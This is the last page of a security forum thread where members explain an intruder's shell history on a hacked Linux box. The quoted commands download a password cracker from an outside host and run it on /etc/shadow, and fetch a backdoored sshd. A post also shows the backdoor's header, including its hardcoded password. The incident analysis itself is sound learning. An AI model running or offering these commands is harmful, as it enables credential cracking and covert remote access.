dcsimg
Page 3 of 3 FirstFirst 123
Results 21 to 24 of 24
  1. #21
    Senior Member
    Join Date
    Dec 2004
    Posts
    137
    Hi, I have a dumb question.

    pico genx.h
    pico genx.h
    pico ssh2includes.h
    why did he edit this?


    also, so he got in via a weak web account that was allowed to telnet and/or ssh?

  2. #22
    Junior Member
    Join Date
    Mar 2003
    Posts
    14
    My knowledge in linux is slowly coming back, but is this interpretation correct?

    w
    Does a who command to see who is all on the system.

    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
    john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
    ../run;./john /etc/shadow

    These commands are broken into parts shown by a seperator(the semicolon). First wget command grabs what I am guessing is john the ripper or another password cracker. Second command is to basically unzip the file in windows terms. Then he removes the original zipped up archive. Changes the directory and makes the exe. Next command changes directory to the executable file. Then the ./ runs the program on /etc/shadow. This would make me assume that he already had root from the exploit, but probably would rather have a valid account for later use.

    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
    -rf sshd.tar.gz;cd sshd;cd apps/ssh

    Gets a file which I am guessing is a SSH server either whole because the target server didn't have the files installed or a hacked up version for his use.

    The rest of it is pretty much setting up the backdoor and cleaning up a little.

    That is just my interpretation of it broken down into tiny bits. Please point out any faulty points in my logic though cause I really need to get my linux skills back.

  3. #23
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    Requirements will set the framework for security. Personally, I have also seen many apps use wget to grab updates via a daily cron job.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #24
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    He downloaded a backdoored version of sshd and used pico to set the password before he compiled it.

    genx.h:
    Code:
    int genx=0,genxlookup=0;
    char genxpass[]="toji",genxbuf[1024];
    char genxfile[]="/dev/saux";
    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •